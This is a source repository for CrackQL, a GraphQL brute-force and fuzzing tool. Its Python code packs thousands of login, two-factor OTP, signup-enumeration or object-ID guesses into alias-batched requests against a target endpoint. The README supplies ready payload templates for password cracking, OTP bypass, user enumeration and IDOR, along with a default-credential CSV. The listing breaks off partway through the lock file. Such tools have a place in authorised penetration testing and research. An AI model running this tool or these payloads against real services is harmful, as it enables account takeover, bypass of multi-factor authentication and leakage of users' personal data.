├── .gitignore ├── CrackQL.py ├── LICENSE ├── README.md ├── config.py ├── lib ├── generator.py ├── helpers.py ├── parser.py └── validations.py ├── poetry.lock ├── pyproject.toml ├── requirements.txt ├── sample-inputs └── usernames_and_passwords.csv ├── sample-queries ├── enumeration.graphql.md ├── idor.graphql.md ├── login.graphql └── otp-bypass.graphql.md ├── static ├── CrackQL-Banner.png └── CrackQL.png └── version.py /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | results/ 12 | build/ 13 | develop-eggs/ 14 | dist/ 15 | downloads/ 16 | eggs/ 17 | .eggs/ 18 | lib/ 19 | lib64/ 20 | parts/ 21 | sdist/ 22 | var/ 23 | wheels/ 24 | share/python-wheels/ 25 | *.egg-info/ 26 | .installed.cfg 27 | *.egg 28 | MANIFEST 29 | 30 | # PyInstaller 31 | # Usually these files are written by a python script from a template 32 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 33 | *.manifest 34 | *.spec 35 | 36 | # Installer logs 37 | pip-log.txt 38 | pip-delete-this-directory.txt 39 | 40 | # Unit test / coverage reports 41 | htmlcov/ 42 | .tox/ 43 | .nox/ 44 | .coverage 45 | .coverage.* 46 | .cache 47 | nosetests.xml 48 | coverage.xml 49 | *.cover 50 | *.py,cover 51 | .hypothesis/ 52 | .pytest_cache/ 53 | cover/ 54 | 55 | # Translations 56 | *.mo 57 | *.pot 58 | 59 | # Django stuff: 60 | *.log 61 | local_settings.py 62 | db.sqlite3 63 | db.sqlite3-journal 64 | 65 | # Flask stuff: 66 | instance/ 67 | .webassets-cache 68 | 69 | # Scrapy stuff: 70 | .scrapy 71 | 72 | # Sphinx documentation 73 | docs/_build/ 74 | 75 | # PyBuilder 76 | .pybuilder/ 77 | target/ 78 | 79 | # Jupyter Notebook 80 | .ipynb_checkpoints 81 | 82 | # IPython 83 | profile_default/ 84 | ipython_config.py 85 | 86 | # pyenv 87 | # For a library or package, you might want to ignore these files since the code is 88 | # intended to run in multiple environments; otherwise, check them in: 89 | # .python-version 90 | 91 | # pipenv 92 | # According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. 93 | # However, in case of collaboration, if having platform-specific dependencies or dependencies 94 | # having no cross-platform support, pipenv may install dependencies that don't work, or not 95 | # install all needed dependencies. 96 | #Pipfile.lock 97 | 98 | # poetry 99 | # Similar to Pipfile.lock, it is generally recommended to include poetry.lock in version control. 100 | # This is especially recommended for binary packages to ensure reproducibility, and is more 101 | # commonly ignored for libraries. 102 | # https://python-poetry.org/docs/basic-usage/#commit-your-poetrylock-file-to-version-control 103 | #poetry.lock 104 | 105 | # pdm 106 | # Similar to Pipfile.lock, it is generally recommended to include pdm.lock in version control. 107 | #pdm.lock 108 | # pdm stores project-wide configurations in .pdm.toml, but it is recommended to not include it 109 | # in version control. 110 | # https://pdm.fming.dev/#use-with-ide 111 | .pdm.toml 112 | 113 | # PEP 582; used by e.g. github.com/David-OConnor/pyflow and github.com/pdm-project/pdm 114 | __pypackages__/ 115 | 116 | # Celery stuff 117 | celerybeat-schedule 118 | celerybeat.pid 119 | 120 | # SageMath parsed files 121 | *.sage.py 122 | 123 | # Environments 124 | .env 125 | .venv 126 | env/ 127 | venv/ 128 | ENV/ 129 | env.bak/ 130 | venv.bak/ 131 | 132 | # Spyder project settings 133 | .spyderproject 134 | .spyproject 135 | 136 | # Rope project settings 137 | .ropeproject 138 | 139 | # mkdocs documentation 140 | /site 141 | 142 | # mypy 143 | .mypy_cache/ 144 | .dmypy.json 145 | dmypy.json 146 | 147 | # Pyre type checker 148 | .pyre/ 149 | 150 | # pytype static type analyzer 151 | .pytype/ 152 | 153 | # Cython debug symbols 154 | cython_debug/ 155 | 156 | # PyCharm 157 | # JetBrains specific template is maintained in a separate JetBrains.gitignore that can 158 | # be found at https://github.com/github/gitignore/blob/main/Global/JetBrains.gitignore 159 | # and can be added to the global gitignore or merged into this file. For a more nuclear 160 | # option (not recommended) you can uncomment the following to ignore the entire idea folder. 161 | #.idea/ -------------------------------------------------------------------------------- /CrackQL.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import os 3 | import csv 4 | import math 5 | import time 6 | import jinja2 7 | import graphql 8 | import uuid 9 | import json 10 | 11 | from optparse import OptionParser 12 | from version import VERSION 13 | from lib.validations import verify_url, verify_inputs 14 | from lib.parser import get_root_type, get_csv_row_count, get_operation, parse_data_response, parse_error_response 15 | from lib.generator import generate_payload, send_payload, stringify, intify, floatify 16 | from lib.helpers import print_output 17 | from graphql.language import print_ast 18 | from pprint import pprint 19 | from urllib.parse import urlparse 20 | 21 | 22 | def main(): 23 | # Get arguments 24 | 25 | parser = OptionParser( 26 | usage='python3 %prog -t http://example.com/graphql -q sample-queries/login.graphql -i sample-inputs/usernames_and_passwords.csv' 27 | ) 28 | parser.add_option( 29 | '-t', 30 | '--target', 31 | dest='url', 32 | help='Target url with a path to the GraphQL endpoint' 33 | ) 34 | parser.add_option( 35 | '-q', 36 | '--query', 37 | dest='query', 38 | help='Input query or mutation operation with variable payload markers' 39 | ) 40 | parser.add_option( 41 | '-i', 42 | '--input-csv', 43 | dest='input_csv', 44 | help='Path to a csv list of arguments (i.e. usernames, emails, ids, passwords, otp_tokens, etc.)' 45 | ) 46 | parser.add_option( 47 | '-d', 48 | '--delimiter', 49 | dest='delimiter', 50 | help='CSV input delimiter (default: ",")', 51 | default=',' 52 | ) 53 | parser.add_option( 54 | '-o', 55 | '--output-directory', 56 | dest='output_directory', 57 | help='Output directory to store results (default: ./results/[domain]_[uuid]/', 58 | ) 59 | parser.add_option( 60 | '-b', 61 | '--batch-size', 62 | dest='batch_size', 63 | help='Number of batch operations per GraphQL document request (default: 100)', 64 | default=1000 65 | ) 66 | parser.add_option( 67 | '-D', 68 | '--delay', 69 | dest='delay', 70 | help='Time delay in seconds between batch requests (default: 0)', 71 | default=0 72 | ) 73 | parser.add_option( 74 | '--verbose', 75 | action='store_true', 76 | dest='verbose', 77 | help='Prints out verbose messaging', 78 | default=False 79 | ) 80 | 81 | parser.add_option( 82 | '-v', 83 | '--version', 84 | action='store_true', 85 | dest='version', 86 | help='Print out the current version and exit.', 87 | default=False 88 | ) 89 | 90 | options, args = parser.parse_args() 91 | 92 | print('[+] Starting CrackQL...') 93 | 94 | # Verify required arguments exist 95 | 96 | if options.version: 97 | print('version:', VERSION) 98 | sys.exit(0) 99 | 100 | if not options.url: 101 | parser.error('Target URL (-t) not given') 102 | parser.print_help() 103 | sys.exit(1) 104 | 105 | if not options.query: 106 | parser.error('GraphQL query operation (-q) not given ') 107 | parser.print_help() 108 | sys.exit(1) 109 | 110 | if not options.input_csv: 111 | parser.error('Input file (-i) not given') 112 | parser.print_help() 113 | sys.exit(1) 114 | 115 | print_output('[*] Validating URL and CSV Inputs...', options.verbose) 116 | 117 | # Verify Target GraphQL Endpoint 118 | 119 | if not verify_url(options.url): 120 | sys.exit(1) 121 | 122 | # Verify Input CSV exists and is correct csv format 123 | 124 | if not verify_inputs(options.query, options.input_csv, options.delimiter): 125 | sys.exit(1) 126 | 127 | print_output('[*] Generating Batch Queries Payloads...', options.verbose) 128 | 129 | env = jinja2.Environment(autoescape=False) 130 | env.filters['str'] = stringify 131 | env.filters['int'] = intify 132 | env.filters['float'] = floatify 133 | 134 | with open(options.query, 'r') as file: 135 | query_data = file.read() 136 | 137 | # Store root operation type 138 | root_type = get_root_type(query_data) 139 | 140 | batch_operations = '' 141 | alias_id = 1 142 | batches_sent = 0 143 | csv_rows = get_csv_row_count(options.input_csv, options.delimiter) 144 | total_requests_to_send = math.ceil(csv_rows / int(options.batch_size)) 145 | data_results = [] 146 | error_results = [] 147 | raw_data = [] 148 | raw_errors = [] 149 | initial_query = open(options.query, 'r').read() 150 | ast = None 151 | 152 | with open(options.input_csv, newline='') as csvfile: 153 | reader = csv.DictReader(csvfile, delimiter=options.delimiter, skipinitialspace=True) 154 | reader2 = csv.DictReader(csvfile, delimiter=options.delimiter, skipinitialspace=True) 155 | suffix = 0 156 | count = 0 157 | variables_list = [] 158 | for variables in reader: 159 | count += 1 160 | variables_list.append(variables) 161 | template = env.from_string(initial_query) 162 | query = template.render(variables) 163 | ast = graphql.parse(query) 164 | 165 | """Add Aliases to each field node""" 166 | for definition in ast.definitions: 167 | 168 | for a in definition.selection_set.selections: 169 | suffix += 1 170 | a.alias = graphql.language.ast.NameNode() 171 | a.alias.value = 'alias' + str(suffix) 172 | 173 | batch_operations = batch_operations +'\n'+ get_operation(print_ast(ast)) 174 | 175 | if (count +1) > (int(options.batch_size) * (batches_sent + 1)): 176 | batches_sent += 1 177 | time.sleep(int(options.delay)) 178 | payload = generate_payload(batch_operations, root_type) 179 | response = send_payload(options.url, payload, batches_sent, total_requests_to_send, options.verbose) 180 | raw_data, data_results = parse_data_response(response, raw_data, data_results, variables) 181 | raw_errors, error_results = parse_error_response(response, raw_errors, error_results, variables) 182 | batch_operations = '' 183 | 184 | if batches_sent != total_requests_to_send: 185 | batches_sent += 1 186 | time.sleep(int(options.delay)) 187 | payload = generate_payload(batch_operations, root_type) 188 | response = send_payload(options.url, payload, batches_sent, total_requests_to_send, options.verbose) 189 | raw_data, data_results = parse_data_response(response, raw_data, data_results, variables, False, variables_list) 190 | raw_errors, error_results = parse_error_response(response, raw_errors, error_results, variables, False, variables_list) 191 | batch_operations = '' 192 | 193 | 194 | print_output('===============================\nResults:\n', options.verbose) 195 | 196 | if options.verbose: 197 | print("Data:") 198 | pprint(data_results) 199 | 200 | print("Errors:") 201 | pprint(error_results) 202 | 203 | if options.output_directory: 204 | directory = options.output_directory 205 | else: 206 | directory = 'results/' + urlparse(options.url).netloc + '_' + str(uuid.uuid4())[0:6] 207 | print('[*] Writing to directory', directory) 208 | if not os.path.exists(directory): 209 | os.makedirs(directory, exist_ok=True) 210 | 211 | if raw_data: 212 | f = open(directory + '/data.json', 'w') 213 | json.dump(data_results, f) 214 | f.close() 215 | 216 | if raw_errors: 217 | f = open(directory + '/errors.json', 'w') 218 | f.write(str(raw_errors)) 219 | f.close() 220 | 221 | 222 | if __name__ == '__main__': 223 | main() 224 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | BSD 3-Clause License 2 | 3 | Copyright (c) 2021, CrackQL 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | 1. Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | 2. Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | 3. Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | CrackQL 2 | ======= 3 | CrackQL is a GraphQL password brute-force and fuzzing utility. 4 | 5 |
46 | mutation { 47 | login(username: {{username|str}}, password: {{password|str}}) { 48 | accessToken 49 | } 50 | } 51 |52 | 53 | ### Two-factor Authentication OTP Bypass 54 | 55 | It is possible to use CrackQL to bypass two-factor authentication by sending all OTP (One Time Password) tokens 56 | 57 | [sample-queries/otp-bypass.graphql](sample-queries/otp-bypass.graphql) 58 |
59 | mutation { 60 | twoFactor(otp: {{otp|int}}) { 61 | accessToken 62 | } 63 | } 64 |65 | 66 | ### User Account Enumeration 67 | 68 | CrackQL can also be used for enumeration attacks to discover valid user ids, usernames and email addresses 69 | 70 | [sample-queries/enumeration.graphql](sample-queries/enumeration.graphql) 71 |
72 | query { 73 | signup(email: {{email|str}}, password: {{password|str}}) { 74 | user { 75 | email 76 | } 77 | } 78 | } 79 |80 | 81 | ### Insecure Direct Object Reference 82 | 83 | CrackQL could be used to iterate over a large number of potential unique identifiers in order to leak object information 84 | 85 | [sample-queries/idor.graphql](sample-queries/idor.graphql) 86 |
87 | query { 88 | profile(uuid: {{uuid|int}}) { 89 | name 90 | email 91 | picture 92 | } 93 | } 94 |95 | 96 | ### General Fuzzing 97 | 98 | CrackQL can be used for general input fuzzing operations, such as sending potential SQLi and XSS payloads. 99 | 100 | ## Inputs 101 | 102 | CrackQL will generate payloads based on input variables defined by a CSV file. CrackQL requires the CSV header to match the input name. 103 | 104 | [sample-inputs/usernames_and_passwords.csv](sample-inputs/usernames_and_passwords.csv) 105 |
106 | username, password 107 | admin, admin 108 | admin, password 109 | admin, pass 110 | admin, pass123 111 | admin, password123 112 | operator, operator 113 | operator, password 114 | operator, pass 115 | operator, pass123 116 | operator, password123 117 |118 | 119 | #### Valid input types 120 | - `str` 121 | - `int` 122 | - `float` 123 | 124 | ## Installation 125 | 126 | ### Requirements 127 | - Python3 128 | - Requests 129 | - GraphQL 130 | - Jinja 131 | 132 | ### Clone Repository 133 | ``` 134 | git clone git@github.com:nicholasaleks/CrackQL.git 135 | ``` 136 | 137 | ### Get Dependencies 138 | `pip install -r requirements.txt` 139 | 140 | ### Run CrackQL 141 | `python3 CrackQL.py -h` 142 | 143 | ``` 144 | Usage: python3 CrackQL.py -t http://example.com/graphql -q sample-queries/login.graphql -i sample-inputs/usernames_and_passwords.csv 145 | 146 | Options: 147 | -h, --help show this help message and exit 148 | -t URL, --target=URL Target url with a path to the GraphQL endpoint 149 | -q QUERY, --query=QUERY 150 | Input query or mutation operation with variable 151 | payload markers 152 | -i INPUT_CSV, --input-csv=INPUT_CSV 153 | Path to a csv list of arguments (i.e. usernames, 154 | emails, ids, passwords, otp_tokens, etc.) 155 | -d DELIMITER, --delimiter=DELIMITER 156 | CSV input delimiter (default: ",") 157 | -o OUTPUT_DIRECTORY, --output-directory=OUTPUT_DIRECTORY 158 | Output directory to store results (default: 159 | ./results/[domain]_[uuid]/ 160 | -b BATCH_SIZE, --batch-size=BATCH_SIZE 161 | Number of batch operations per GraphQL document 162 | request (default: 100) 163 | -D DELAY, --delay=DELAY 164 | Time delay in seconds between batch requests (default: 165 | 0) 166 | --verbose Prints out verbose messaging 167 | -v, --version Print out the current version and exit. 168 | ``` 169 | 170 | ## Configuration 171 | Use `config.py` to set HTTP cookies, headers or proxies if the endpoint requires authentication. 172 | 173 | ## Maintainers 174 | * [Nick Aleks](https://github.com/nicholasaleks) 175 | * [Dolev Farhi](https://github.com/dolevf) 176 | 177 | ## Mentions 178 | * [Kitploit](https://www.kitploit.com/2022/07/crackql-graphql-password-brute-force.html) 179 | -------------------------------------------------------------------------------- /config.py: -------------------------------------------------------------------------------- 1 | HEADERS = {} 2 | COOKIES = {} 3 | PROXIES = {} 4 | -------------------------------------------------------------------------------- /lib/generator.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import config 3 | import requests 4 | 5 | from lib.parser import indent 6 | from lib.validations import verify_query 7 | from lib.helpers import print_output 8 | 9 | 10 | def stringify(text): 11 | ''' 12 | Custom jinja filter used to wrap strings 13 | ''' 14 | return '"{}"'.format(text) 15 | 16 | def intify(text): 17 | ''' 18 | Custom jinja filter used to assign integers 19 | ''' 20 | return int(text) 21 | 22 | 23 | def floatify(text): 24 | ''' 25 | Custom jinja filter used to assign floats 26 | ''' 27 | return float(text) 28 | 29 | def generate_payload(batch_operations, root_type): 30 | ''' 31 | Takes the total batch of alias operations and wraps it with the original root type 32 | ''' 33 | operation_body = indent(batch_operations, 4) 34 | return root_type + operation_body + '\n}' 35 | 36 | def send_payload(url, payload, batches_sent, total_requests_to_send, verbose=False): 37 | ''' 38 | Sends a packaged GraphQL query with populated payload in a single batch request 39 | ''' 40 | 41 | print_output('[+] Payload {num}: \n{payload}'.format(payload=payload, num=batches_sent), verbose) 42 | 43 | print_output('[+] Verifying Payload Batch Operation...', verbose) 44 | if not verify_query(payload, query_format='String'): 45 | print('Error: Bad GraphQL Query - Check Query and/or Payloads') 46 | sys.exit(1) 47 | 48 | print('[+] Sending Alias Batch {batches_sent} of {total_requests_to_send} to {url}...'.format( 49 | batches_sent=batches_sent, 50 | total_requests_to_send=total_requests_to_send, 51 | url=url 52 | )) 53 | 54 | try: 55 | response = requests.post( 56 | url, 57 | verify=False, 58 | cookies=config.COOKIES, 59 | headers=config.HEADERS, 60 | proxies=config.PROXIES, 61 | timeout=360, 62 | json={'query':payload} 63 | ) 64 | return response.json() 65 | 66 | except Exception as e: 67 | print('Error: {e}'.format(e=e)) 68 | sys.exit(1) 69 | 70 | -------------------------------------------------------------------------------- /lib/helpers.py: -------------------------------------------------------------------------------- 1 | def print_output(message, verbose): 2 | if verbose: 3 | print(message) -------------------------------------------------------------------------------- /lib/parser.py: -------------------------------------------------------------------------------- 1 | import re 2 | import csv 3 | import textwrap 4 | import json 5 | 6 | try: 7 | import textwrap 8 | textwrap.indent 9 | except AttributeError: # undefined function (wasn't added until Python 3.3) 10 | def indent(text, amount, ch=' '): 11 | padding = amount * ch 12 | return ''.join(padding+line for line in text.splitlines(True)) 13 | else: 14 | def indent(text, amount, ch=' '): 15 | return textwrap.indent(text, amount * ch) 16 | 17 | def get_root_type(query_data): 18 | ''' 19 | Extracts the root operation type from the input query 20 | ''' 21 | first = query_data.split('\n', 1)[0] 22 | return first 23 | 24 | def get_operation(query_data): 25 | first = query_data.split('\n', 1)[1] 26 | last = first[:first.rfind('\n')] 27 | return textwrap.dedent(last) 28 | 29 | def get_variable_type(query_data, variable): 30 | ''' 31 | Identifies if jinja variables from CSV header exist in query 32 | ''' 33 | regex = r"\{\{.*" + re.escape(variable) + r".*\|(str|int|float)\}\}" 34 | try: 35 | return re.search(regex, query_data).group(1) 36 | except: 37 | return False 38 | 39 | def get_csv_row_count(csv_input, delimiter): 40 | ''' 41 | Return to total number of rows in the CSV (minus header) 42 | ''' 43 | csv_line_count = -1 44 | with open(csv_input, newline='') as csvfile: 45 | reader = csv.reader(csvfile, delimiter=delimiter) 46 | for row in reader: 47 | if any(row): 48 | csv_line_count+=1 49 | 50 | return csv_line_count 51 | 52 | def get_variables(csv_input, delimiter): 53 | ''' 54 | Return the variable names from the header of CSV 55 | ''' 56 | with open(csv_input, newline='') as csvfile: 57 | reader = csv.reader(csvfile, delimiter=delimiter) 58 | list_of_column_names = [] 59 | for row in reader: 60 | list_of_column_names = row 61 | break 62 | return list_of_column_names 63 | 64 | def parse_data_response(response, raw_data, data_results, inputs, verbose=False, variables_list=None): 65 | ''' 66 | Packages the responses from the batched queries and returns both raw and formated data 67 | ''' 68 | 69 | data_result = {} 70 | 71 | try: 72 | data = response.get('data') 73 | if isinstance(data, dict): 74 | raw_data.append(data) 75 | 76 | for count, (name, data_value) in enumerate(data.items()): 77 | current_input = variables_list[count] if variables_list else inputs 78 | data_result = { 79 | name: { 80 | 'inputs': current_input, 81 | 'data': data_value 82 | } 83 | } 84 | data_results.append(data_result) 85 | 86 | except Exception as e: 87 | print(e) 88 | 89 | # Edit the random key by a same key (result) 90 | try: 91 | for key in data_results: 92 | key["result"] = key.pop(next(iter(key))) 93 | 94 | except Exception as e: 95 | print(e) 96 | 97 | return (raw_data, data_results) 98 | 99 | def parse_error_response(response, raw_errors, error_results, inputs, verbose=False, variables_list=None): 100 | ''' 101 | Packages the responses from the batched queries and returns both raw and formated errors 102 | ''' 103 | error_result = {} 104 | try: 105 | if 'errors' in response and isinstance(response['errors'], list): 106 | count = 0 107 | for r in response['errors']: 108 | raw_errors.append(r) 109 | message = r.get('message') 110 | 111 | try: 112 | alias = r.get('path')[0] 113 | except: 114 | alias = 'undefined' 115 | 116 | 117 | error_result[alias] = {} 118 | if variables_list: 119 | error_result[alias]['inputs'] = variables_list[count] 120 | else: 121 | error_result[alias]['inputs'] = inputs 122 | error_result[alias]['error'] = r['message'] 123 | error_results.append(error_result) 124 | error_result = {} 125 | count += 1 126 | 127 | except Exception as e: 128 | print(e) 129 | 130 | return (raw_errors, error_results) 131 | -------------------------------------------------------------------------------- /lib/validations.py: -------------------------------------------------------------------------------- 1 | import config 2 | import csv 3 | import requests 4 | 5 | from graphql import parse 6 | from lib.parser import get_variable_type 7 | 8 | requests.packages.urllib3.disable_warnings() 9 | 10 | def verify_url(url): 11 | ''' 12 | Verifies that the GraphQL endpoint url is valid by running a simple test 13 | ''' 14 | query = ''' 15 | query { 16 | __typename 17 | } 18 | ''' 19 | 20 | try: 21 | response = requests.post( 22 | url, 23 | cookies=config.COOKIES, 24 | headers=config.HEADERS, 25 | proxies=config.PROXIES, 26 | verify=False, 27 | timeout=10, 28 | json={'query': query} 29 | ).json() 30 | 31 | if response.get('data'): 32 | if response.get('data', {}).get('__typename', '') in ('Query', 'QueryRoot', 'query_root'): 33 | return True 34 | elif response.get('errors') and (any('locations' in i for i in response['errors']) or (any('extensions' in i for i in response))): 35 | return True 36 | elif response.get('data'): 37 | return True 38 | 39 | except Exception as e: 40 | print('Error: {e}'.format(e=e)) 41 | return False 42 | 43 | 44 | def verify_query(query, query_format='File'): 45 | ''' 46 | Checks whether or not a GraphQL query is formatted correctly 47 | ''' 48 | if query_format == 'File': 49 | with open(query, 'r') as file: 50 | data = file.read() 51 | try: 52 | ast = parse(data) 53 | except Exception as e: 54 | print('Error: Invalid GraphQL Operation \n{data} \n{e}'.format(data=data, e=e)) 55 | return False 56 | elif query_format == 'String': 57 | try: 58 | ast = parse(query) 59 | except Exception as e: 60 | print('Error: Invalid GraphQL Operation \n{data} \n{e}'.format(data=data, e=e)) 61 | return False 62 | return True 63 | 64 | 65 | def verify_inputs(query, csv_input, delimiter): 66 | ''' 67 | Validates CSV inputs to ensure they match payload jinja variables 68 | ''' 69 | with open(csv_input, newline='') as csvfile: 70 | reader = csv.reader(csvfile, delimiter=delimiter, skipinitialspace=True) 71 | list_of_column_names = [] 72 | for row in reader: 73 | list_of_column_names = row 74 | break 75 | 76 | with open(query, 'r') as file: 77 | query_data = file.read() 78 | 79 | for variable in list_of_column_names: 80 | if not get_variable_type(query_data, variable): 81 | print('Error: CSV Header Payload "{variable}" not found in GraphQL operation \n{query_data}'.format( 82 | variable=variable, 83 | query_data=query_data, 84 | ) 85 | ) 86 | print('Please verify the GraphQL operation payloads match the csv header') 87 | return False 88 | 89 | return True 90 | -------------------------------------------------------------------------------- /poetry.lock: -------------------------------------------------------------------------------- 1 | [[package]] 2 | name = "certifi" 3 | version = "2022.6.15" 4 | description = "Python package for providing Mozilla's CA Bundle." 5 | category = "main" 6 | optional = false 7 | python-versions = ">=3.6" 8 | 9 | [[package]] 10 | name = "charset-normalizer" 11 | version = "2.0.12" 12 | description = "The Real First Universal Charset Detector. Open, modern and actively maintained alternative to Chardet." 13 | category = "main" 14 | optional = false 15 | python-versions = ">=3.5.0" 16 | 17 | [package.extras] 18 | unicode_backport = ["unicodedata2"] 19 | 20 | [[package]] 21 | name = "graphql-core" 22 | version = "3.2.1" 23 | description = "GraphQL implementation for Python, a port of GraphQL.js, the JavaScript reference implementation for GraphQL." 24 | category = "main" 25 | optional = false 26 | python-versions = ">=3.6,<4" 27 | 28 | [[package]] 29 | name = "idna" 30 | version = "3.3" 31 | description = "Internationalized Domain Names in Applications (IDNA)" 32 | category = "main" 33 | optional = false 34 | python-versions = ">=3.5" 35 | 36 | [[package]] 37 | name = "jinja2" 38 | version = "3.0.3" 39 | description = "A very fast and expressive template engine." 40 | category = "main" 41 | optional = false 42 | python-versions = ">=3.6" 43 | 44 | [package.dependencies] 45 | MarkupSafe = ">=2.0" 46 | 47 | [package.extras] 48 | i18n = ["Babel (>=2.7)"] 49 | 50 | [[package]] 51 | name = "markupsafe" 52 | version = "2.0.1" 53 | description = "Safely add untrusted strings to HTML/XML markup." 54 | category = "main" 55 | optional = false 56 | python-versions = ">=3.6" 57 | 58 | [[package]] 59 | name = "requests" 60 | version = "2.27.1" 61 | description = "Python HTTP for Humans." 62 | category = "main" 63 | optional = false 64 | python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*, !=3.5.*" 65 | 66 | [package.dependencies] 67 | certifi = ">=2017.4.17" 68 | charset-normalizer = {version = ">=2.0.0,<2.1.0", markers = "python_version >= \"3\""} 69 | idna = {version = ">=2.5,<4", markers = "python_version >= \"3\""} 70 | urllib3 = ">=1.21.1,<1.27" 71 | 72 | [package.extras] 73 | socks = ["PySocks (>=1.5.6,!=1.5.7)", "win-inet-pton"] 74 | use_chardet_on_py3 = ["chardet (>=3.0.2,<5)"] 75 | 76 | [[package]] 77 | name = "typing-extensions" 78 | version = "4.1.1" 79 | description = "Backported and Experimental Type Hints for Python 3.6+" 80 | category = "main" 81 | optional = false 82 | python-versions = ">=3.6" 83 | 84 | [[package]] 85 | name = "urllib3" 86 | version = "1.26.11" 87 | description = "HTTP library with thread-safe connection pooling, file post, and more." 88 | category = "main" 89 | optional = false 90 | python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*, !=3.5.*, <4" 91 | 92 | [package.extras] 93 | brotli = ["brotlicffi (>=0.8.0)", "brotli (>=1.0.9)", "brotlipy (>=0.6.0)"] 94 | secure = ["pyOpenSSL (>=0.14)", "cryptography (>=1.3.4)", "idna (>=2.0.0)", "certifi", "ipaddress"] 95 | socks = ["PySocks (>=1.5.6,!=1.5.7,<2.0)"] 96 | 97 | [metadata] 98 | lock-version = "1.1" 99 | python-versions = "^3.6.0" 100 | content-hash = "dd55f087945ab0c13720378e26ab1e2b37441c14305de52e099a4f3f7a03f0ab" 101 | 102 | [metadata.files] 103 | certifi = [ 104 | {file = "certifi-2022.6.15-py3-none-any.whl", hash = "sha256:fe86415d55e84719d75f8b69414f6438ac3547d2078ab91b67e779ef69378412"}, 105 | {file = "certifi-2022.6.15.tar.gz", hash = "sha256:84c85a9078b11105f04f3036a9482ae10e4621616db313fe045dd24743a0820d"}, 106 | ] 107 | charset-normalizer = [ 108 | {file = "charset-normalizer-2.0.12.tar.gz", hash = "sha256:2857e29ff0d34db842cd7ca3230549d1a697f96ee6d3fb071cfa6c7393832597"}, 109 | {file = "charset_normalizer-2.0.12-py3-none-any.whl", hash = "sha256:6881edbebdb17b39b4eaaa821b438bf6eddffb4468cf344f09f89def34a8b1df"}, 110 | ] 111 | graphql-core = [ 112 | {file = "graphql-core-3.2.1.tar.gz", hash = "sha256:9d1bf141427b7d54be944587c8349df791ce60ade2e3cccaf9c56368c133c201"}, 113 | {file = "graphql_core-3.2.1-py3-none-any.whl", hash = "sha256:f83c658e4968998eed1923a2e3e3eddd347e005ac0315fbb7ca4d70ea9156323"}, 114 | ] 115 | idna = [ 116 | {file = "idna-3.3-py3-none-any.whl", hash = "sha256:84d9dd047ffa80596e0f246e2eab0b391788b0503584e8945f2368256d2735ff"}, 117 | {file = "idna-3.3.tar.gz", hash = "sha256:9d643ff0a55b762d5cdb124b8eaa99c66322e2157b69160bc32796e824360e6d"}, 118 | ] 119 | jinja2 = [ 120 | {file = "Jinja2-3.0.3-py3-none-any.whl", hash = "sha256:077ce6014f7b40d03b47d1f1ca4b0fc8328a692bd284016f806ed0eaca390ad8"}, 121 | {file = "Jinja2-3.0.3.tar.gz", hash = "sha256:611bb273cd68f3b993fabdc4064fc858c5b47a973cb5aa7999ec1ba405c87cd7"}, 122 | ] 123 | markupsafe = [ 124 | {file = "MarkupSafe-2.0.1-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:d8446c54dc28c01e5a2dbac5a25f071f6653e6e40f3a8818e8b45d790fe6ef53"}, 125 | {file = "MarkupSafe-2.0.1-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:36bc903cbb393720fad60fc28c10de6acf10dc6cc883f3e24ee4012371399a38"}, 126 | {file = "MarkupSafe-2.0.1-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:2d7d807855b419fc2ed3e631034685db6079889a1f01d5d9dac950f764da3dad"}, 127 | {file = "MarkupSafe-2.0.1-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:add36cb2dbb8b736611303cd3bfcee00afd96471b09cda130da3581cbdc56a6d"}, 128 | {file = "MarkupSafe-2.0.1-cp310-cp310-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:168cd0a3642de83558a5153c8bd34f175a9a6e7f6dc6384b9655d2697312a646"}, 129 | {file = "MarkupSafe-2.0.1-cp310-cp310-musllinux_1_1_aarch64.whl", hash = 